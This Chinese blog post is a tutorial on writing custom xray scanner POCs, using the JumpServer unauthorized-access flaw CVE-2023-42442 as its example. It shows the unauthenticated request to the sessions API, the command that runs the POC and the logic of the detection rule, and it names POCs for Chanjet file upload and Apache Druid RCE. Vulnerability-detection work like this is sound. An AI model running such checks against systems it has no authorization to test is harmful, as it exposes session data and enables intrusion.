xray之以CVE-2023-42442为例POC编写
xray下载
社区版下载和使用
注意下载新版的,旧版可能无法加载自定义POC
https://github.com/chaitin/xray/releases
使用方法
查看help
xray_windows_amd64.exe webscan --help
1 | Version: 1.9.11/eb0c331d/COMMUNITY |
查看webscan使用
xray_windows_amd64.exe webscan --help
1 | Version: 1.9.11/eb0c331d/COMMUNITY |
CVE-2023-42442漏洞复现
参考:https://blog.csdn.net/holyxp/article/details/133066481
https://www.secrss.com/articles/58981
burp发送请求包:
1 | GET /api/v1/terminal/sessions/?limit=2 HTTP/1.1 |
查看response
1 | HTTP/1.1 200 OK |
自定义POC演示
使用方法,运行单个自定义POC,命令如下:
1 | xray_windows_amd64.exe webscan --plugins phantasm --poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml --url http://example.com/ --html-output CVE-2023-42442.html --json-output CVE-2023-42442.json |
这是一个JumpServer未授权访问漏洞(CVE-2023-42442)。POC如下:
原理很简单,这段代码描述了对服务器响应的检查条件。它要求响应的状态码为200,并且响应体中包含特定的字符串:”count”、”next”、”previous”和”results”。这些条件共同判断了漏洞利用的成功条件。
1 | name: poc-yaml-jumpserver-session-replay-unauth |
执行过程:
1 | ____ ___.________. ____. _____.___. |
最后,打开html报告查看漏洞详情即可。
POC编写指南
如何编写高质量POC:https://docs.xray.cool/#/guide/hiq/summary
规则实验室:https://poc.xray.cool/
可以通过该工具便捷的生成POC,同时可以使用该工具对POC进行格式检查与查重
具体可以查看开发者文档:https://docs.xray.cool/#/guide/README
- 插件的基本构成:https://docs.xray.cool/#/guide/yaml/yaml_script_v2
- 插件运行逻辑:https://docs.xray.cool/#/guide/yaml/yaml_run_logic
- POC编写模板:https://docs.xray.cool/#/guide/yaml/yaml_poc_template
社区贡献的POC:https://github.com/chaitin/xray/tree/master/pocs
POC示例:
1 | name: poc-yaml-yonyou-chanjet-file-updoad |
1 | name: poc-yaml-apache-druid-kafka-rce |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 h4m5t's Blog!